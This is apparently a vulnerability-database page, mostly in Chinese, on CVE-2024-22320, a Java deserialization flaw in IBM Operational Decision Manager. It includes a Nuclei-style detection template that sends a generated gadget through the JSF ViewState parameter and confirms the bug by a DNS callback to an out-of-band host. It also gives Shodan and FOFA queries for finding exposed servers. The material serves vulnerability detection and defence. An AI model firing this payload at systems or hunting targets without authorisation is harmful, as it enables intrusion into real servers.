CVE-2024-22320: IBM Operational Decision Manager - Java Deserialization

日期: 2025-08-01 | 影响软件: IBM Operational Decision Manager | POC: 已公开

漏洞描述

IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.

PoC代码[已公开]

id: CVE-2024-22320

info:
  name: IBM Operational Decision Manager - Java Deserialization
  author: DhiyaneshDK
  severity: high
  description: |
    IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM.  IBM X-Force ID:  279146.
  reference:
    - https://labs.watchtowr.com/double-k-o-rce-in-ibm-operation-decision-manager/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-22320
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2024-22320
    cwe-id: CWE-502
    epss-score: 0.92226
    epss-percentile: 0.99706
    cpe: cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ibm
    product: operational_decision_manager
    shodan-query:
      - html:"IBM ODM"
      - http.html:"ibm odm"
    fofa-query:
      - title="IBM ODM"
      - title="ibm odm"
      - body="ibm odm"
  tags: cve,cve2024,ibm,odm,decision-manager,deserialization,jsf,rce,vkev

http:
  - method: GET
    path:
      - '{{BaseURL}}/res/login.jsf?javax.faces.ViewState={{generate_java_gadget("dns", "http://{{interactsh-url}}", "base64")}}'

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - 'javax.servlet.ServletException'

      - type: status
        status:
          - 500
# digest: 490a004630440220424622e74e36f3fb22f7700eab933c452c8fc7c40bca97d199f171f230a54a53022042b3cbae07fbc69a787b258602fb1bc32d2b8e0ebddc5f084bea69962bf3eb7d:922c64590222798bb761d5b6d8e72950

相关漏洞推荐